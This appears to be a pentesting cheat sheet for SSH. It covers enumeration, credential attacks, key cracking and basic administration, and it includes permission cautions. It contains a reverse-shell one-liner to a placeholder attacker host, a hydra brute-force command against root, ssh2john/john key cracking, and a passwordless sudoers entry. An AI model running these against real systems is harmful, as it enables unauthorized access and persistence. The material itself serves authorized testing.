22 SSH

---

Notes

---

Alternative Ports
2222, 8022, etc.

Service Description
SSH (Secure Shell) runs on TCP port 22 and provides encrypted remote administration, tunneling, and file transfer (SCP/SFTP). Commonly used to manage Unix/Linux systems, but also found on network appliances and embedded devices. SSH supports both password and public key authentication.

Don’t brute force SSH without explicit permission.

Excessive login attempts can trigger lockouts, account bans, or alert monitoring systems. A ‘single password’ spray may be acceptable.

---

Attacks

---

Weak or Default Credentials
Attackers may brute-force or guess default creds on exposed devices or newly provisioned systems.

Public Key Trust Misuse
Exposed private keys, reused keypairs, or poorly scoped authorized_keys entries can allow pivoting or privilege escalation.

Outdated or Weak Ciphers
Misconfigured servers may allow deprecated or insecure algorithms (e.g. arcfour, cbc, or diffie-hellman-group1-sha1).

Command Injection via SSH wrapper scripts
Poorly written authorized_keys command restrictions or SSH wrapper scripts can sometimes be bypassed.

---

Tools & Exploits

---

Enumeration

---

nmap
Standard SSH version and script probe.

nmap -sV -p22 --script ssh2-enum-algos,ssh-hostkey,ssh-auth-methods <target>

ssh-audit
Audits server for weak configurations and algorithms.

ssh-audit <ip>

hydra / medusa / ncrack
Use with care, only when explicitly permitted.

hydra -l root -P passwords.txt ssh://<target>

OpenSSH Client
Manual probing and banner grabbing.

ssh -vvv <user>@<target>

---

Exploitation or Post-Enum

---

Exposed SSH Keys
Look for private keys on compromised hosts or in backups.

ssh -i id_rsa user@target

Shell escape via SSH-restricted shell

ssh user@target 'bash -i >& /dev/tcp/attackerip/4444 0>&1'

ssh2john (for cracking private keys)
Extracts hash from SSH private key for use with john.

python3 /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=rockyou.txt id_rsa.hash

---

Admin Tasks & Usage

---

Creating a New SSH Key Pair

ssh-keygen -t rsa -b 4096 -f ~/.ssh/mykey

Generates public/private keypair for authentication. Public key can be appended to ~/.ssh/authorized_keys on target.

Starting SSH Service (Linux)

sudo systemctl start ssh
sudo systemctl enable ssh

Or for distros using service:

sudo service ssh start

Adding a Public Key for Login Access

cat ~/mykey.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh

Run Commands Remotely

ssh user@remote-host 'command to run'
# Example update permissions
ssh user@remote-host "echo 'your-username ALL=(ALL) NOPASSWD:ALL' | sudo tee /etc/sudoers.d/your-username"

---

Wireshark Analysis Tips

---

Filters

tcp.port == 22

What to look for:

• SSH version exchange (first few packets)
• Key exchange/init
• Auth method negotiation
• Signs of brute force (repeated connection attempts)

---

References

---

• https://book.hacktricks.wiki/network-services-pentesting/ssh-pentesting
• https://github.com/jtesta/ssh-audit
• https://nmap.org/nsedoc/scripts/ssh2-enum-algos.html
• https://www.ssh.com/academy/ssh/security-best-practices